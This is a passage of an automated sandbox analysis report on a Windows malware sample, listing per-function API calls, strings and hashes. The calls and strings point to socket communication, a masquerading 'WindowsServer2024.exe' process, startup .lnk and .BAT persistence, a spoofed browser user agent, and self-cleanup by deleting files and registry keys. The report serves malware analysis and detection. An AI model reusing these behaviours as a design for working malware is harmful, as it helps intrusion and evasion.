                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$InfoLocale___crt$AllocCloseCreate__snwprintf_memsetclosesocketsetsockoptshutdown
                                                                            • String ID: SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 1227969885-90677415
                                                                            • Opcode ID: 31c76f6ae7df673f57c97773d27135982f5f2dc2522bae7bab36a300c39ecbad
                                                                            • Instruction ID: d169ea9c86dac97756c57bd2dbb6aa770c1b7686bee323c8ea9e03afd59630f3
                                                                            • Opcode Fuzzy Hash: 31c76f6ae7df673f57c97773d27135982f5f2dc2522bae7bab36a300c39ecbad
                                                                            • Instruction Fuzzy Hash: 3C024B71900219DBEB64CB64CC49FADB7B8BB88310F10869CF619A7291DB785EC5CF61
                                                                            Function 007E1220 Relevance: 45.2, APIs: 30, Instructions: 186synchronizationmemorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E117D
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E11A0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E11B8
                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 007E126B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E1281
                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 007E1298
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1580,00000000,00000000,00000000), ref: 007E12C4
                                                                            • GetTickCount.KERNEL32 ref: 007E12E1
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1309
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1323
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E133E
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E13D7
                                                                            • closesocket.WS2_32(00000000), ref: 007E13E1
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E13F2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E13FE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1419
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E1430
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E143A
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1453
                                                                            • closesocket.WS2_32(00000000), ref: 007E145D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1469
                                                                            • ExitProcess.KERNEL32 ref: 007E14B0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E14C6
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E14D7
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E14E8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E14F4
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1504
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E151B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicksetsockopt
                                                                            • String ID:
                                                                            • API String ID: 3704011687-0
                                                                            • Opcode ID: dbbde087f6a851058167e80a840cc8ff14cbbc755b7b5d5e72b99b527ccc18cc
                                                                            • Instruction ID: e4ba470a664a7966c476eb19a99b9006c6872060d8c6e249d69fea40e2bfcab6
                                                                            • Opcode Fuzzy Hash: dbbde087f6a851058167e80a840cc8ff14cbbc755b7b5d5e72b99b527ccc18cc
                                                                            • Instruction Fuzzy Hash: 52713B71A01344EBDB14DFA5EC8EBAE7776BB48301F608518F602A62E1CB7C9941CF54
                                                                            Function 007D2F20 Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 129sleepregistrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{16B194B1-19CC-4C52-92E2-1BFAC8473D8C}), ref: 007D2F3F
                                                                            • SetEvent.KERNEL32(00000000), ref: 007D2F5B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D2F68
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8931AB7A-A1AA-4E58-80EA-2B1247F36722}), ref: 007D2F84
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007D2FA2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D2FAF
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D2FC5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2FDA
                                                                            • __snwprintf.LIBCMT ref: 007D301F
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D302E
                                                                            • _memset.LIBCMT ref: 007D306A
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D30A5
                                                                            • SHFileOperationW.SHELL32(?), ref: 007D30C2
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D30E2
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D30F1
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D30FE
                                                                            • wnsprintfW.SHLWAPI ref: 007D312E
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000000,00000000), ref: 007D3147
                                                                            Strings
                                                                            • {8931AB7A-A1AA-4E58-80EA-2B1247F36722}, xrefs: 007D2F78
                                                                            • %s\%s, xrefs: 007D300E
                                                                            • {C2479B37-C2B3-42BB-AA73-3313D48DF29B}, xrefs: 007D3002
                                                                            • {E83187BB-7111-445B-879E-34A213BF001C}, xrefs: 007D3118
                                                                            • Software\%s, xrefs: 007D311D
                                                                            • {16B194B1-19CC-4C52-92E2-1BFAC8473D8C}, xrefs: 007D2F33
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWait__snwprintf_memsetlstrlenwnsprintf
                                                                            • String ID: %s\%s$Software\%s${16B194B1-19CC-4C52-92E2-1BFAC8473D8C}${8931AB7A-A1AA-4E58-80EA-2B1247F36722}${C2479B37-C2B3-42BB-AA73-3313D48DF29B}${E83187BB-7111-445B-879E-34A213BF001C}
                                                                            • API String ID: 1130256755-521004812
                                                                            • Opcode ID: c4bfe062a50d825d0f06f3aa84cfb50d4e6f8fea7462b506d5f35c3adb2fcb4b
                                                                            • Instruction ID: b7034097fd1f6d1e37a7d4cb4dd37dcb59a6d1ab5ff9a494d2c5d7a6b7d45bce
                                                                            • Opcode Fuzzy Hash: c4bfe062a50d825d0f06f3aa84cfb50d4e6f8fea7462b506d5f35c3adb2fcb4b
                                                                            • Instruction Fuzzy Hash: CA516C70E092589BDB609B60DC49BA97775FF88701F0085DAF50DB6280DBBC6A84CF51
                                                                            Function 007DB630 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 209synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007DB654
                                                                            • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 007DB678
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Strings
                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 007DB6C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Create$EventFreeLocalMutex
                                                                            • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                            • API String ID: 4059844998-3593534564
                                                                            • Opcode ID: f7da211a911537d477fa7c52f4b30371aa75d8280875074115a10685f0a30255
                                                                            • Instruction ID: 36d92581dc02f8681fd90cdd400ba28ac3a1486a6ced06164f1b921d22e047fd
                                                                            • Opcode Fuzzy Hash: f7da211a911537d477fa7c52f4b30371aa75d8280875074115a10685f0a30255
                                                                            • Instruction Fuzzy Hash: C5917B72A00304EFDB24DF60ED89BA977B9BB88300F50855AF645973A1DB785E40CF66
                                                                            Function 007E8307 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,007E6189), ref: 007E830F
                                                                            • __mtterm.LIBCMT ref: 007E831B
                                                                              • Part of subcall function 007E8054: DecodePointer.KERNEL32(00000004,007E847D,?,007E6189), ref: 007E8065
                                                                              • Part of subcall function 007E8054: TlsFree.KERNEL32(00000003,007E847D,?,007E6189), ref: 007E807F
                                                                              • Part of subcall function 007E8054: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,007E847D,?,007E6189), ref: 007EC612
                                                                              • Part of subcall function 007E8054: _free.LIBCMT ref: 007EC615
                                                                              • Part of subcall function 007E8054: DeleteCriticalSection.KERNEL32(00000003,77375810,?,007E847D,?,007E6189), ref: 007EC63C
                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007E8331
                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007E833E
                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007E834B
                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007E8358
                                                                            • TlsAlloc.KERNEL32(?,007E6189), ref: 007E83A8
                                                                            • TlsSetValue.KERNEL32(00000000,?,007E6189), ref: 007E83C3
                                                                            • __init_pointers.LIBCMT ref: 007E83CD
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E83DE
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E83EB
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E83F8
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E8405
                                                                            • DecodePointer.KERNEL32(007E81D8,?,007E6189), ref: 007E8426
                                                                            • __calloc_crt.LIBCMT ref: 007E843B
                                                                            • DecodePointer.KERNEL32(00000000,?,007E6189), ref: 007E8455
                                                                            • GetCurrentThreadId.KERNEL32 ref: 007E8467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                            • API String ID: 3698121176-3819984048
                                                                            • Opcode ID: bb9da50b7b4b9aee8251270ce083ef82f6dc0f3d498797fee6dc39c6b44d075a
                                                                            • Instruction ID: ec6352c671c451a6ebb4f7aa5d8e822a869ad667cf5cf9d7042447fd0d7be4b2
                                                                            • Opcode Fuzzy Hash: bb9da50b7b4b9aee8251270ce083ef82f6dc0f3d498797fee6dc39c6b44d075a
                                                                            • Instruction Fuzzy Hash: 8931A671907345DBC7916F77BC0A52A3FA0FBA97607104A1AE92C932B0EF398442CF95
                                                                            Function 007D2920 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 117memoryprocessstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2952
                                                                            • __snwprintf.LIBCMT ref: 007D297C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D298B
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00007FFF), ref: 007D29A9
                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 007D29BF
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D29D4
                                                                            • __snwprintf.LIBCMT ref: 007D2A03
                                                                            • _memset.LIBCMT ref: 007D2A13
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007D2A3E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A4D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A57
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A61
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A6B
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A7C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A86
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A90
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2A9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$__snwprintflstrlen$CreateFileFolderKnownModuleNamePathProcessTask_memsetlstrcmpi
                                                                            • String ID: "%s%s" %s$%s%s$D$WindowsServer2024.exe${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}
                                                                            • API String ID: 2642993909-2604637141
                                                                            • Opcode ID: 6c846c8447f29daf2679084849feec5cf869ac20d5bafd6f5c23a51655d38612
                                                                            • Instruction ID: f34ef6e797f80260b935d1e47a660aee93dd5f711bf4bcdf313dc4865b3ea79e
                                                                            • Opcode Fuzzy Hash: 6c846c8447f29daf2679084849feec5cf869ac20d5bafd6f5c23a51655d38612
                                                                            • Instruction Fuzzy Hash: B54130B5A40209ABDB10DBE4CC49FBE7B75FF88701F104969F601B6291DB789A41CB61
                                                                            Function 007D3160 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 95memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,007D5BA8), ref: 007D317A
                                                                            • SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D3196
                                                                            • __snwprintf.LIBCMT ref: 007D31B7
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007D31C3
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D31CD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D31D7
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D31EA
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D31FF
                                                                            • __snwprintf.LIBCMT ref: 007D3229
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3238
                                                                            • __snwprintf.LIBCMT ref: 007D3263
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007D326F
                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 007D3279
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D3283
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D328D
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D3297
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc__snwprintf$DeleteFileFolderKnownPathTask$DirectoryRemove
                                                                            • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT${268A4BEB-78DB-4CA2-877B-85BE85A2E24B}${35573C81-0DF9-44C4-B616-731CF1FC3E59}${628E1A37-FDD6-4466-82D3-55913E02016C}
                                                                            • API String ID: 1689349194-68691684
                                                                            • Opcode ID: 3438a1b6316e7dd5e0cd9fd6be3dfd2b850e1f68b61bd47af754455bccc0878f
                                                                            • Instruction ID: 4fbd9b1d18eb82545e36866ee536445d427617caf5637da727d89f286f2e2b38
                                                                            • Opcode Fuzzy Hash: 3438a1b6316e7dd5e0cd9fd6be3dfd2b850e1f68b61bd47af754455bccc0878f
                                                                            • Instruction Fuzzy Hash: 853132B5A40309FBDB14DBA4DC4EF7E7779BB88701F104925F601B6390DAB89A40CB65
                                                                            Function 007CE110 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 149memoryprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CE187
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CE1D8
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CE1E5
                                                                            • wnsprintfW.SHLWAPI ref: 007CE242
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CE252
                                                                            • wnsprintfW.SHLWAPI ref: 007CE284
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007CE2CB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CE2DE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CE2EB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CE2F8
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CE30A
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CE31D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CE327
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CE333
                                                                            • closesocket.WS2_32(?), ref: 007CE33D
                                                                              • Part of subcall function 007CB6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB70C
                                                                              • Part of subcall function 007CB6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                              • Part of subcall function 007CB6D0: __snwprintf.LIBCMT ref: 007CB74E
                                                                              • Part of subcall function 007CB6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB77C
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocCreateEvent$ErrorLastwnsprintf$CloseDirectoryFileHandleOpenProcess__snwprintfclosesocketsetsockoptshutdown
                                                                            • String ID: "%s" %s$%s%s$D$WindowsServer2024.exe${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 2452205246-585898561
                                                                            • Opcode ID: b6992aa4adc89439c1b3bfd64e8dcea073102924a841c26899969fe3f7ac0792
                                                                            • Instruction ID: 601250a124c1a424868e320331ebfd8c8a7f5b49b8094a47b00a4f175d3097fb
                                                                            • Opcode Fuzzy Hash: b6992aa4adc89439c1b3bfd64e8dcea073102924a841c26899969fe3f7ac0792
                                                                            • Instruction Fuzzy Hash: 60512CB1A00218ABEB24DBA4DC49FADB775FB88700F1085ACF609A7291DB749984CF51
                                                                            Function 007D69A0 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 145threadnetworkstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(UNLOAD.TXT), ref: 007D69AE
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D69C0
                                                                            • CreateThread.KERNEL32(00000000,00000000,007CBA30,00000000,00000000,00000000), ref: 007D69E3
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6A01
                                                                            • _memset.LIBCMT ref: 007D6A7A
                                                                            • __snwprintf.LIBCMT ref: 007D6A9F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6AD9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6B24
                                                                            • CreateThread.KERNEL32(00000000,00000000,007CF100,00000000,00000000,00000000), ref: 007D6B47
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6B64
                                                                            • WSAStartup.WS2_32(00000002,?), ref: 007D6B73
                                                                            • CreateThread.KERNEL32(00000000,00000000,007DB630,00000000,00000000,00000000), ref: 007D6B95
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1030,00000000,00000000,00000000), ref: 007D6BAF
                                                                            • WSACleanup.WS2_32 ref: 007D6BCA
